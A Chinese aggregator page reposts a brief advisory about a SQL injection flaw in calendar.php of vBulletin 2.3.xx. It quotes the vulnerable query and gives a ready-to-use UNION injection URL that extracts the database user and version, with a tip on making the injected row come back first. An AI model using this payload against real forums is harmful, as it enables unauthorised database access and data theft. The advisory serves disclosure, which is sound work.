vBulletin Forum 2.3.xx SQL Injection

飞过の海

飞过の海

2016-02-19 11:39

想要天天向上,就要懂得享受学习。图老师为大家推荐vBulletin Forum 2.3.xx SQL Injection,精彩的内容需要你们用心的阅读。还在等什么快点来看看吧!

vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site-query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
展开更多 50%)
分享

猜你喜欢

vBulletin Forum 2.3.xx SQL Injection

Web开发
vBulletin Forum 2.3.xx SQL Injection

Advanced SQL Injection with MySQL

编程语言 网络编程
Advanced SQL Injection with MySQL

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

用PHP函数解决SQL injection

PHP
用PHP函数解决SQL injection

针对SQL INJECTION的SQL SERVER安全设置初级篇

SQLServer
针对SQL INJECTION的SQL SERVER安全设置初级篇

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

一个asp函数 解决SQL Injection漏洞

Web开发
一个asp函数 解决SQL Injection漏洞

一个asp函数 解决SQL Injection漏洞

ASP
一个asp函数  解决SQL Injection漏洞

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

java Hibernate 一对多自身关联问题

java Hibernate 一对多自身关联问题

jsp生成静态页面的方法

jsp生成静态页面的方法
下拉加载更多内容 ↓